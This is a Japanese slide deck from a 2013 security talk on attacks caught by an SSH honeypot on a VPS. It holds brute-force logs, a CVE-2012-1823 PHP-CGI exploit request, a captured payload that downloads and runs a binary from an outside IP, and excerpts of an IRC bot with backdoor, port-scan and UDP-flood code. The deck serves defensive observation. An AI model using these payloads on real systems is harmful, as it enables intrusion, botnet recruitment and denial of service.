SlideShare a Scribd company logo
1 of 49
さくらのVPSに来る悪い人
を観察する その2
Security Casual Talks すみだセキュリティ勉強会その2
2013/12/07 @ozuma5119
2013-11-18 20:12:18 login attempt [root/12345] failed
2013-11-18 20:12:21 login attempt [root/1qazxsw23edc] failed
2013-11-18 20:12:25 login attempt [root/Passw0rd] failed
2013-11-18 20:12:28 login attempt [root/password0] failed
2013-11-18 20:12:32 login attempt [root/password1] failed
176.223.62.254 - - [23/Nov/2013:12:44:01 +0900] "POST /cgibin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63
%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%6
4%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%
69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73
%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+
%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F
%6E%65+%2D%64+%61%75%74%6F%5F
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

1
自己紹介
• @ozuma5119
• ネット企業でセキュリティサービスをやっ
ているエンジニア
• http://d.hatena.ne.jp/ozuma/
• 科学写真家(と名乗っている)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

2
話すことの概要
• 個人で借りているさくらのVPSにいろいろ
来るので、その攻撃を観察してみた
• 悪いことしてる人たちがどうしようとし
ているかが、なんとなくかいま見えた。
ので誰かに言いたくなった
– ボットネット。

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

3
ボットネット?

「ボットネットからの保護」http://www.microsoft.com/ja-jp/security/pc-security/botnet.aspx より引用
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

4
きょう、話さないこと
• セキュアなプログラミング手法とか
• セキュアなサーバ構築の手順とか
– そういうのは教科書的なものがいっぱいある
ので、まぁここで話さなくてもいいかな、と
……

• 教科書
– LPIC Linuxセキュリティ標準教科書(無料)
• http://www.lpi.or.jp/linuxtext/security.shtml

– IPA 「安全なウェブサイトの作り方」(無料)
• https://www.ipa.go.jp/security/vuln/websecurity.html

– 徳丸浩「体系的に学ぶ 安全なWebアプリケー
ションの作り方」
• http://www.amazon.co.jp/dp/4797361190

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

5
こんなん見ました・その1
• SSH (Secure Shell)
– 安全にリモートコンピュータと通信するため
のプロトコル

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

6
こんなん見ました・その1
• なんかVPS(仮想専用サーバ)借りるとsshロ
グインがいっぱい来るんですけど。
– SSHブルートフォースの観察
– 侵入した人が打とうとしているコマンド調べ
– 日本初!(たぶん世界初)。侵入者にアンケート
を取ってみました

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

7
sshd
• ssh接続のためにsshdを上げていると、世
界中から招かれざる客が来ます

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

8
/var/log/secure
Aug 19 21:56:35 sshd[4331]: Failed password for root from 1..
Aug 19 21:56:38 sshd[4335]: Failed password for root from 1..
Aug 19 21:56:42 sshd[4339]: Failed password for root from 1..
Aug 19 21:56:47 sshd[4343]: Failed password for root from 1..
Aug 19 21:56:51 sshd[4347]: Failed password for root from 1..
Aug 19 21:56:56 sshd[4351]: Failed password for root from 1..
Aug 19 21:57:00 sshd[4355]: Failed password for root from 1..
Aug 19 21:57:05 sshd[4359]: Failed password for root from 1..
Aug 19 21:57:09 sshd[4363]: Failed password for root from 1..
Aug 19 21:57:12 sshd[4367]: Failed password for root from 1..

Shit! (クソっ
たれが!)
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

9
sshアタック多すぎるので少しデー
タ取ってみる
• 興味として、どこから、どんなIDやパス
ワードが試されているのか知りたい。
– /var/log/secureには、入れられたパスワードは
出ないのでハニーポットソフトを使います

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

10
sshアタック多すぎるので少しデー
タ取ってみる 2
• 悪い人たちは、ログインできたら次に何
をしようとしているのか知りたい。
– 観察記だし。

• 「悪とは何か?」「正義とは何か?」は難
しいので今はパスします
– 妻を人質にとられて、泣く泣くsshアタック
している人がいるかもしれない(いないだろ
うけど)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

11
kippo – SSH Honeypot

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

12
kippo – SSH Honeypot
• sshdっぽく振る舞ってくれるハニーポット

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

13
kippo – SSH Honeypot 2
• ログ取りして観察できる様々な機能
– 入力されたID・パスワード取得
– ダミーユーザはテキストファイルで簡単追加
– 端末で打たれたコマンドは全てログ取得し、
付属アプリで「再生」可能(おもしろ)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

14
やられサーバ構成
• さくらのVPS
– 49.212.197.88

• sshd
– tcp/2222 (kippo)
– tcp/20222 (sshd)
– tcp/22からtcp/2222
へiptablesでポート
フォワード
– 10月下旬から11月
30日までのデータ
取得

さくらインターネット公式ブログより引用
http://sakuraha-blog.jp/

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

15
まずはログイン分析
2013-11-21 07:02:31+0900 [SSHService ssh-userauth on
HoneyPotTransport,13,218.68.3.136] login attempt
[root/root123] failed
2013-11-21 07:02:33+0900 [SSHService ssh-userauth on
HoneyPotTransport,14,218.68.3.136] login attempt
[root/112233] failed
2013-11-21 07:02:40+0900 [SSHService ssh-userauth on
HoneyPotTransport,15,218.68.3.136] login attempt
[root/123123] failed
2013-11-21 07:02:45+0900 [SSHService ssh-userauth on
HoneyPotTransport,16,218.68.3.136] login attempt
[root/zaq1xsw2] failed

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

16
ssh狙われるアカウント TOP5
1位 2位 3位 4位
5位
root ftpuser oracle nagios postgresql
65.8% 1.3%
1.1% 0.65%
0.55%
総試行:14646

• rootが絶大な人気。(まだ) oracleも多い
• 最近はnagios(サーバ監視ソフト)も目立つ
– この辺のアカウントは/sbin/nologinでログイン
不可にしておいていいはず

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

17
ssh試されたパスワード TOP5
1位

2位
3位
4位
5位
passwo 1qaz2w p@ssw
123456
111111
rd
sx
0rd
0.91% 0.68% 0.45% 0.40% 0.38%
総試行:14646

• まんべんなく試されているので突出した
ものはない。
• こういうのを蓄積すれば、「狙われやす
いパスワード」が分かってくる
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

18
sshソースIPアドレス(国別)
1位

2位

3位

4位

5位

中国 アメリカ メキシコ 韓国 ドイツ
54.6%

13.7%

10.8%

5.8%

4.6%
総試行:14646

• まぁだいたい妥当なランキング
• メキシコが多いのは、10/23の1日だけ猛烈
なアタックがあったから……
– 普段は滅多に来ない国です。たまたま。ア
ミーゴ。
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

19
もっと面白いモノを見る
• Kippoには、侵入者がどんなコマンドを
打ったのかログを取り、あとで再生でき
る機能があります
– キーボード打つ際の、待ち時間なども全てそ
のまま再現してくれるのでリアルです

• ということでちょっと鑑賞してみましょ
う

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

20
It's show time!

http://youtu.be/gp3SBjZNWHU

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

21
ツッコミタイム
• 最初にwコマンドは基本
• apt-get install yum が斬新すぎてウケる
• そもそもrootじゃないのに何故apt-get
installできると思うのか
• エディタはnanoじゃなくてvi使おう
• Ray.txtはPerlスクリプトなのかPHPスクリ
プトなのかどっちだよ

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

22
Ray.txt
#!/usr/bin/perl

#####################################################
#####################################################
## DDoS Perl IrcBot v1.0 / 2012 by RAYDENNN Security Team
##
Stealth MultiFunctional IrcBot writen in Perl
##
Teste on every system with PERL instlled
##
## This is a free program used on your own risk.
##
Created for educational purpose only.
## I'm not responsible for the illegal use of this program.
#####################################################
## [ Channel ] #################### [ Flood ] #############
#####################################################
## !u @join <#channel>
## !u @udp1 <ip> <port> <
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)
## !u @part <#channel>
## !u @udp2 <ip> <packet 23
仕掛けようとしていたモノ
• eggdrop
– IRC bot

• Ray.txt
– DDoS Perl IRCbot

• psyBNC
– IRCサーバへのリレー(中継)ソフト

• どれもボットネット関係

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

24
ssh 侵入者に人気のコマンド
• sshハニーポットを立てていると、侵入者
が最初に打つコマンドはダントツで w

※ wって草生やしてるわけじゃないよ、念のため
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

25
kippoのwコマンドを差し替え
• kippoのソースをいじって、wコマンドで
アンケートに協力してよ!と出すことに
した
srvapl001:/$ w
Hi! I conduct a suvey of SSH honeypot.
Please give me a hand to collect data. :-)

どこの国?

1st question)
Where are you from? (China,Russia,Romania,.. etc.):
2nd question)
What your nickname? :
Thanks!

お名前は?

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

26
アンケートに回答してくれた人
• 1名いました!
• 悪い人とコミュニケーションが取れた!

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

27
srvapl001:/$ w
Hi! I conduct a suvey of SSH honeypot.
Please give me a hand to collect data. :-)
1st question)
Where are you from? (China,Russia,Romania,.. etc.):
Romania
2nd question)
What your nickname? : Romania
Thanks!

• ルーマニアから来たRomaniaさん
– キー入力の反応速度から見て、ちゃんとこの
アンケート文を見て答えてくれたようです
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

28
こんなん見ました・その1
完
その2に続く

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

29
こんなん見ました・その2
• 最近よく見る /cgi-bin/php へのアタック
94.xx.xx.xx - - [20/Nov/2013:11:47:22 +0900] "POST /cgibin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63
%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%6
4%65%3D%6F%66%66+%2D%64+%73%75%68%6F
(省略)
%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6
E%76%3D%30+%2D%6E HTTP/1.1" 500 613 "-" "-"

↓ これ

POST /cgi-bin/php?%2D%64+.......
みなさん来ていますか? 来ていませんか?
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

30
復習:CGI版PHPの仕組み
• Apacheの場合
1. /usr/bin/php-cgi へのシンボリックリンクを、
/var/www/cgi-bin/php に作る
2. .phpファイルにハンドラを設定
3. ハンドラのActionとして/cgi-bin/php を設定

AddHandler php-script .php
Action php-script /cgi-bin/php
httpd.conf

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

31
CGI版PHPの仕組み その2
• サーバ上の.phpファイルがアクセスされ
ると、/cgi-bin/php を裏で実行する
• ユーザからのアクセスで直接/cgi-bin/php
が叩かれることは無い
– が、叩くことはできてしまう

– 叩いたところでエラーになるだけなので無意
味(だったのだが……)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

32
ここでCVE-2012-1823 脆弱性
• 以下のような感じのPOSTを投げつけるだ
けで、お好きなPHPスクリプトをサーバ上
で実行させることができる(CGI版PHP)
POST /myapp.php?-d allow_url_include=on
-d auto_prepend_file=php://input HTTP/1.0
<?php
readfile('/etc/passwd');
?>
参考URL
http://blog.tokumaru.org/2012/05/php-cgi-remote-scripting-cve-2012-1823.html
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

33
CVE-2012-1823脆弱性を利用した新しい攻撃手
法

http://blog.tokumaru.org/2013/11/apache-magica-attack.html
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

より引用

34
魔法少女アパッチ☆マギカ攻撃
はどこが新しくて危険か
• 今まで見つかっていたCGI版PHPの脆弱性
は、サーバ上に設置したPHPスクリプトを
ターゲットとしていた(例:index.php)
– つまりPHPインストールしただけでPHPスク
リプトを置いていないサーバは実質無害だっ
た
– この攻撃は /cgi-bin/php を直接狙うため、PHP
をインストールしてるだけで被害を受ける

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

35
全てをURLエンコード(ログ検知避け?)
84.xx.xx.xx - - [14/Nov/2013:09:16:48 +0900] "POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+
%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63
%6C%75%64%65%3D%6F%6E+%2D

/cgi-bin/php?より後をURLエンコード

85.xx.xx.xx - - [15/Nov/2013:20:21:15 +0900] "POST /cgibin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6
C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D
%64+%73%61%66%65

必要最低限だけURLエンコード (COOL!)

192.xx.xx.xx - - [23/Nov/2013:19:15:41 +0900] "GET /cgibin/php?-d+allow_url_include%3Don+d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+d+
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

36
Magica攻撃を観察:リクエスト
のURL差
• 大きく分けて3パターン (犯行グループごと
に違うのか?)
1. 全てをURLエンコード(ログ検知避け?)
2. /cgi-bin/php?より後をURLエンコード
3. 必要最低限だけURLエンコード (COOLだね!)

• URLが微妙に違うので単純に/cgi-bin/php
だけgrepしてると検知できない

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

37
攻撃を食らうとどうなるのか
• POSTボディ部を見れば、何をされそうに
なったかはすぐ分かる
• ボットを仕込まれ、C&Cサーバに接続
– バックドア付き

• いろんなのが降ってきたのだけど、全部
紹介するととても時間足りないので、1つ
の事例をかいつまんで紹介します

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

38
150.162.19.45 - - [13/Nov/2013:07:23:27 +0900]
"POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D
%(省略)%75%74+%2D%6E HTTP/1.1" 500 602 "-"
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
<? system("cd /tmp ; wget 207.56.197.8/lol ; curl -O
207.56.197.8/lol; fetch 207.56.197.8/lol ; chmod +x
lol ; ./lol ; rm -rf lol "); ?>

150.162.19.45
Universidade Federal de Santa Catarina(ブラ
ジル)
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)
39
リクエストBODY
<? system("cd /tmp ;
wget 207.56.197.8/lol ;
curl -O 207.56.197.8/lol;
fetch 207.56.197.8/lol ;
chmod +x lol ;
./lol ;
rm -rf lol ");
?>

207.56.197.8
NTT America,
Inc.(US)

lolというプログラムを実行するようだ。
(lolとはスラングで、日本語に訳せば「ワロスww」

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

40
lolスクリプトの動作
• 試しにwgetしてみて中を見てみた
• Perl製のShellBOTという名前(そう書いてあ
る)
• IRCでC&Cサーバに接続して、
– 命令を受けてポートスキャンしたり
– 命令を受けてDoS攻撃をしたり
– バックドアを開いたり

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

41
#!/usr/bin/perl
#
# ShellBOT by: devil__
#
Greetz: Puna, Kelserific
#
# Comandos:
#
@oldpack <ip> <bytes> <tempo>;
#
@udp <ip> <porta> <tempo>;
#
@fullportscan <ip> <porta inicial> <porta final>;
#
@conback <ip> <porta>
#
@download <url> <arquivo a ser salvo>;
#
!estatisticas <on/off>;
#
!sair para finalizar o bot;
#
!novonick para trocar o nick do bot por um novo aleatorio;
#
!entra <canal> <tempo>
#
!sai <canal> <tempo>;
#
!pacotes <on/off>
#
@info
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)
42
lolスクリプトの中身
$servidor='suoraphp.upol.cz' unless $servidor;
my $porta='3303';
my @canais=("#aiurea");
my @adms=("w","r");

• C&Cサーバは .cz :チェコ共和国
• 最近、ルーマニアとか東欧の悪い人たち
の活動が活発です(いろいろと。状況証
拠しかまだ無いんだけど……)

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

43
lolスクリプトの中身2
ポートスキャン
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("21","22","23","25","53","59","79","80","110"
,"113","135","139","443","445","1025","5000","6660","
6661","6662","6663","6665","6666","6667","6668","66
69","7000","8080","8018");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

44
lolスクリプトの中身3 バックドア
elsif ($funcarg =~ /^conbacks+(.*)s+(d+)/) {
...
(省略)
...
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}

• Windows/UNIX両対応です
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

45
lolスクリプトの中身4 DoS攻撃

elsif ($funcarg =~ /^udps+(.*)s+(d+)s+(d+)/) {
...
(省略)
...
while (($pacota == "1")) {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) an
$pacotese++;
• Windows/UNIX両対応
}
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

46
C&Cサーバの中

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

47
さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

48
すみだセキュリティ勉強会

http://ozuma.sakura.ne.jp/sumida/

さくらのVPSに来る悪い人を観察する その2 (@ozuma5119)

49

More Related Content

What's hot

暗号技術の実装と数学
暗号技術の実装と数学暗号技術の実装と数学
暗号技術の実装と数学MITSUNARI Shigeo
 
Redisの特徴と活用方法について
Redisの特徴と活用方法についてRedisの特徴と活用方法について
Redisの特徴と活用方法についてYuji Otani
 
ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計Yoshinori Matsunobu
 
AWS Black Belt Online Seminar 2016 Amazon EC2 Container Service
AWS Black Belt Online Seminar 2016 Amazon EC2 Container ServiceAWS Black Belt Online Seminar 2016 Amazon EC2 Container Service
AWS Black Belt Online Seminar 2016 Amazon EC2 Container ServiceAmazon Web Services Japan
 
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)NTT DATA Technology & Innovation
 
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」Masahito Zembutsu
 
忙しい人の5分で分かるDocker 2017年春Ver
忙しい人の5分で分かるDocker 2017年春Ver忙しい人の5分で分かるDocker 2017年春Ver
忙しい人の5分で分かるDocker 2017年春VerMasahito Zembutsu
 
テストコードの DRY と DAMP
テストコードの DRY と DAMPテストコードの DRY と DAMP
テストコードの DRY と DAMPYusuke Kagata
 
押さえておきたい、PostgreSQL 13 の新機能!!(Open Source Conference 2021 Online/Hokkaido 発表資料)
押さえておきたい、PostgreSQL 13 の新機能!!(Open Source Conference 2021 Online/Hokkaido 発表資料)押さえておきたい、PostgreSQL 13 の新機能!!(Open Source Conference 2021 Online/Hokkaido 発表資料)
押さえておきたい、PostgreSQL 13 の新機能!!(Open Source Conference 2021 Online/Hokkaido 発表資料)NTT DATA Technology & Innovation
 
AlmaLinux と Rocky Linux の誕生経緯&比較
AlmaLinux と Rocky Linux の誕生経緯&比較AlmaLinux と Rocky Linux の誕生経緯&比較
AlmaLinux と Rocky Linux の誕生経緯&比較beyond Co., Ltd.
 
Ansible quickstart
Ansible quickstartAnsible quickstart
Ansible quickstartHideki Saito
 
Hadoop/Spark で Amazon S3 を徹底的に使いこなすワザ (Hadoop / Spark Conference Japan 2019)
Hadoop/Spark で Amazon S3 を徹底的に使いこなすワザ (Hadoop / Spark Conference Japan 2019)Hadoop/Spark で Amazon S3 を徹底的に使いこなすワザ (Hadoop / Spark Conference Japan 2019)
Hadoop/Spark で Amazon S3 を徹底的に使いこなすワザ (Hadoop / Spark Conference Japan 2019)Noritaka Sekiyama
 
オンプレを少しずつコンテナ化する
オンプレを少しずつコンテナ化するオンプレを少しずつコンテナ化する
オンプレを少しずつコンテナ化するKenkichi Okazaki
 
[Aurora事例祭り]Amazon Aurora を使いこなすためのベストプラクティス
[Aurora事例祭り]Amazon Aurora を使いこなすためのベストプラクティス[Aurora事例祭り]Amazon Aurora を使いこなすためのベストプラクティス
[Aurora事例祭り]Amazon Aurora を使いこなすためのベストプラクティスAmazon Web Services Japan
 
Spring Boot の Web アプリケーションを Docker に載せて AWS ECS で動かしている話
Spring Boot の Web アプリケーションを Docker に載せて AWS ECS で動かしている話Spring Boot の Web アプリケーションを Docker に載せて AWS ECS で動かしている話
Spring Boot の Web アプリケーションを Docker に載せて AWS ECS で動かしている話JustSystems Corporation
 
CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!kazkiti
 

What's hot (20)

PostgreSQLバックアップの基本
PostgreSQLバックアップの基本PostgreSQLバックアップの基本
PostgreSQLバックアップの基本
 
PostgreSQL失敗談
PostgreSQL失敗談PostgreSQL失敗談
PostgreSQL失敗談
 
暗号技術の実装と数学
暗号技術の実装と数学暗号技術の実装と数学
暗号技術の実装と数学
 
Redisの特徴と活用方法について
Redisの特徴と活用方法についてRedisの特徴と活用方法について
Redisの特徴と活用方法について
 
ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計
 
AWS Black Belt Online Seminar 2016 Amazon EC2 Container Service
AWS Black Belt Online Seminar 2016 Amazon EC2 Container ServiceAWS Black Belt Online Seminar 2016 Amazon EC2 Container Service
AWS Black Belt Online Seminar 2016 Amazon EC2 Container Service
 
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
 
Athenz + SPIFFE によるアクセス制御
Athenz + SPIFFE によるアクセス制御Athenz + SPIFFE によるアクセス制御
Athenz + SPIFFE によるアクセス制御
 
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
 
忙しい人の5分で分かるDocker 2017年春Ver
忙しい人の5分で分かるDocker 2017年春Ver忙しい人の5分で分かるDocker 2017年春Ver
忙しい人の5分で分かるDocker 2017年春Ver
 
テストコードの DRY と DAMP
テストコードの DRY と DAMPテストコードの DRY と DAMP
テストコードの DRY と DAMP
 
押さえておきたい、PostgreSQL 13 の新機能!!(Open Source Conference 2021 Online/Hokkaido 発表資料)
押さえておきたい、PostgreSQL 13 の新機能!!(Open Source Conference 2021 Online/Hokkaido 発表資料)押さえておきたい、PostgreSQL 13 の新機能!!(Open Source Conference 2021 Online/Hokkaido 発表資料)
押さえておきたい、PostgreSQL 13 の新機能!!(Open Source Conference 2021 Online/Hokkaido 発表資料)
 
AlmaLinux と Rocky Linux の誕生経緯&比較
AlmaLinux と Rocky Linux の誕生経緯&比較AlmaLinux と Rocky Linux の誕生経緯&比較
AlmaLinux と Rocky Linux の誕生経緯&比較
 
Ansible quickstart
Ansible quickstartAnsible quickstart
Ansible quickstart
 
Hadoop/Spark で Amazon S3 を徹底的に使いこなすワザ (Hadoop / Spark Conference Japan 2019)
Hadoop/Spark で Amazon S3 を徹底的に使いこなすワザ (Hadoop / Spark Conference Japan 2019)Hadoop/Spark で Amazon S3 を徹底的に使いこなすワザ (Hadoop / Spark Conference Japan 2019)
Hadoop/Spark で Amazon S3 を徹底的に使いこなすワザ (Hadoop / Spark Conference Japan 2019)
 
分散トレーシング技術について(Open tracingやjaeger)
分散トレーシング技術について(Open tracingやjaeger)分散トレーシング技術について(Open tracingやjaeger)
分散トレーシング技術について(Open tracingやjaeger)
 
オンプレを少しずつコンテナ化する
オンプレを少しずつコンテナ化するオンプレを少しずつコンテナ化する
オンプレを少しずつコンテナ化する
 
[Aurora事例祭り]Amazon Aurora を使いこなすためのベストプラクティス
[Aurora事例祭り]Amazon Aurora を使いこなすためのベストプラクティス[Aurora事例祭り]Amazon Aurora を使いこなすためのベストプラクティス
[Aurora事例祭り]Amazon Aurora を使いこなすためのベストプラクティス
 
Spring Boot の Web アプリケーションを Docker に載せて AWS ECS で動かしている話
Spring Boot の Web アプリケーションを Docker に載せて AWS ECS で動かしている話Spring Boot の Web アプリケーションを Docker に載せて AWS ECS で動かしている話
Spring Boot の Web アプリケーションを Docker に載せて AWS ECS で動かしている話
 
CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!
 

Similar to さくらのVPSに来る悪い人を観察する その2

とある受託ベンダの開発環境
とある受託ベンダの開発環境とある受託ベンダの開発環境
とある受託ベンダの開発環境Tomoki Hasegawa
 
ロボットシステム学2015年第8回
ロボットシステム学2015年第8回ロボットシステム学2015年第8回
ロボットシステム学2015年第8回Ryuichi Ueda
 
イベント会場ネットワーク
イベント会場ネットワークイベント会場ネットワーク
イベント会場ネットワークFumihisa Shigekane
 
A story of porting OpenBSD/luna88k
A story of porting OpenBSD/luna88kA story of porting OpenBSD/luna88k
A story of porting OpenBSD/luna88kKenji Aoyama
 

Similar to さくらのVPSに来る悪い人を観察する その2 (6)

とある受託ベンダの開発環境
とある受託ベンダの開発環境とある受託ベンダの開発環境
とある受託ベンダの開発環境
 
ロボットシステム学2015年第8回
ロボットシステム学2015年第8回ロボットシステム学2015年第8回
ロボットシステム学2015年第8回
 
Open VZ
Open VZOpen VZ
Open VZ
 
イベント会場ネットワーク
イベント会場ネットワークイベント会場ネットワーク
イベント会場ネットワーク
 
Ingress on GKE/GCE
Ingress on GKE/GCEIngress on GKE/GCE
Ingress on GKE/GCE
 
A story of porting OpenBSD/luna88k
A story of porting OpenBSD/luna88kA story of porting OpenBSD/luna88k
A story of porting OpenBSD/luna88k
 

Recently uploaded

【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)Hiroki Ichikura
 
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案sugiuralab
 
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察  ~Text-to-MusicとText-To-ImageかつImage-to-Music...モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察  ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...博三 太田
 
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdfAWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdfFumieNakayama
 
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineerYuki Kikuchi
 
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)UEHARA, Tetsutaro
 
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?akihisamiyanaga1
 
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdfクラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdfFumieNakayama
 
SOPを理解する 2024/04/19 の勉強会で発表されたものです
SOPを理解する       2024/04/19 の勉強会で発表されたものですSOPを理解する       2024/04/19 の勉強会で発表されたものです
